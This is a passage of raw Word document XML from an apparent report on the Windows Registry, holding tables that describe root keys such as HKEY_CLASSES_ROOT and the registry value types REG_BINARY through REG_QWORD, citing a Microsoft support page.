        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="004B1D3D">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00525B3D">
              <w:t>Is a subkey of HKEY_LOCAL_MACHINE\</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>Software. The information that is stored here makes sure that the correct program opens when you open a file by using Windows Explorer. This key is sometimes abbreviated as "HKCR." Starting with Windows 2000, this information is stored under both the HKEY_LOCAL</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>_MACHINE and HKEY_CURRENT_USER keys. The HKEY_LOCAL_MACHINE\Software</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t xml:space="preserve">\Classes key contains default settings that can apply to all users on the local computer. The HKEY_CURRENT_USER\Software\Classes key contains settings that override the default settings and apply only to the interactive user. The HKEY_CLASSES_ROOT key provides a view of the registry that merges the information from these two sources. HKEY_CLASSES_ROOT also provides this merged view for programs that are designed for earlier versions of Windows. To </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:lastRenderedPageBreak/>
              <w:t>change the settings for the interactive user, changes must be made under HKEY_CURRENT</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>_USER\Software\Classes instead of under HKEY_CLASSES_ROOT. To change the default settings, changes must be made under HKEY</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>_LOCAL_MACHINE\Software\Classes. If you write keys to a key under HKEY_CLASSES_</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>ROOT, the system stores the information under HKEY_LOCAL_MACHINE\Software\Classes. If you write values to a key under HKEY</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>_CLASSES_ROOT, and the key already exists under HKEY_CURRENT_USER\Software</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>\Classes, the system will store the information there instead of under HKEY_LOCAL</w:t>
            </w:r>
            <w:r w:rsidR="004B1D3D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00525B3D">
              <w:t>_MACHINE\Software\Classes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00525B3D" w:rsidTr="00525B3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3104" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="00525B3D" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>HKEY_CURRENT_CONFIG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5666" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00525B3D" w:rsidRDefault="004B1D3D" w:rsidP="00ED091A">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="004B1D3D">
              <w:t>Contains information about the hardware profile that is used by the local computer at system startup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00ED091A" w:rsidRDefault="00ED091A" w:rsidP="00ED091A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc484886362"/>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Root keys and their descriptions.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="00ED091A" w:rsidRPr="00ED091A" w:rsidRDefault="00ED091A" w:rsidP="00ED091A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00ED091A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://support.microsoft.com/en-us/help/256986/windows-registry-information-for-advanced-users</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008E4183" w:rsidRPr="008E4183" w:rsidRDefault="008E4183" w:rsidP="000C11BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4183">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Registry Data Type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00281521" w:rsidRDefault="00BE5065" w:rsidP="000C11BF">
      <w:r>
        <w:t>A registry hive</w:t>
      </w:r>
      <w:r w:rsidR="008E4183">
        <w:t xml:space="preserve"> also contains values specify the information that system can use for its operation. A hive can store as many value as it wants and a value can be anything, but its type </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008E4183">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008E4183">
        <w:t xml:space="preserve"> obey the predefined system registry value type. </w:t>
      </w:r>
      <w:r w:rsidR="00281521">
        <w:t>The table below describes the registry types and their descriptions.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1923"/>
        <w:gridCol w:w="3294"/>
        <w:gridCol w:w="3553"/>
      </w:tblGrid>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="00281521" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00281521">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="00281521" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00281521">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Data type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="00281521" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00281521">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="00281521" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00281521">
              <w:t>Binary Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_BINARY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>Raw binary data. Most hardware component information is stored as binary data and is displayed in Registry Editor in hexadecimal format.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>DWORD Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_DWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t xml:space="preserve">Data represented by a number that is 4 bytes long (a 32-bit integer). Many parameters for device drivers and services are this type and are displayed in </w:t>
            </w:r>
            <w:r w:rsidRPr="001670A1">
              <w:lastRenderedPageBreak/>
              <w:t>Registry Editor in binary, hexadecimal, or decimal format. Related values are DWORD_LITTLE_ENDIAN (least significant byte is at the lowest address) and REG_DWORD_BIG_ENDIAN (least significant byte is at the highest address).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="001670A1">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1891"/>
              </w:tabs>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Expandable String Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_EXPAND_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A variable-length data string. This data type includes variables that are resolved when a program or service uses the data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>Multi-String Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_MULTI_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A multiple string. Values that contain lists or multiple values in a form that people can read are generally this type. Entries are separated by spaces, commas, or other marks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00281521" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>String Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A fixed-length text string.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001670A1" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>Binary Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_RESOURCE_LIST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A series of nested arrays that is designed to store a resource list that is used by a hardware device driver or one of the physical devices it controls. This data is detected and written in the \ResourceMap tree by the system and is displayed in Registry Editor in hexadecimal format as a Binary Value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001670A1" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>Binary Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_RESOURCE_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REQUIREMENTS_LIST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t xml:space="preserve">A series of nested arrays that is designed to store a device driver's list of possible hardware resources the driver or one of the physical devices it controls can use. The system writes a subset of this list in the \ResourceMap tree. This data is </w:t>
            </w:r>
            <w:r w:rsidRPr="001670A1">
              <w:lastRenderedPageBreak/>
              <w:t>detected by the system and is displayed in Registry Editor in hexadecimal format as a Binary Value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001670A1" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:lastRenderedPageBreak/>
              <w:t>Binary Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_FULL_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>RESOURCE_DESCRIPTOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A series of nested arrays that is designed to store a resource list that is used by a physical hardware device. This data is detected and written in the \HardwareDescription tree by the system and is displayed in Registry Editor in hexadecimal format as a Binary Value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001670A1" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_NONE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="001670A1">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1002"/>
              </w:tabs>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t xml:space="preserve">Data without any </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001670A1">
              <w:t>particular type</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001670A1">
              <w:t>. This data is written to the registry by the system or applications and is displayed in Registry Editor in hexadecimal format as a Binary Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001670A1" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="001670A1">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_LINK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>A Unicode string naming a symbolic link.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001670A1" w:rsidTr="00281521">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRPr="00281521" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>QWORD Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="000C11BF">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>REG_QWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2927" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001670A1" w:rsidRDefault="001670A1" w:rsidP="00DC7DDE">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001670A1">
              <w:t>Data represented by a number that is a 64-bit integer. This data is displayed in Registry Editor as a Binary Value and was introduced in Windows 2000.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC7DDE" w:rsidRPr="00ED091A" w:rsidRDefault="00DC7DDE" w:rsidP="00DC7DDE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc484886363"/>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
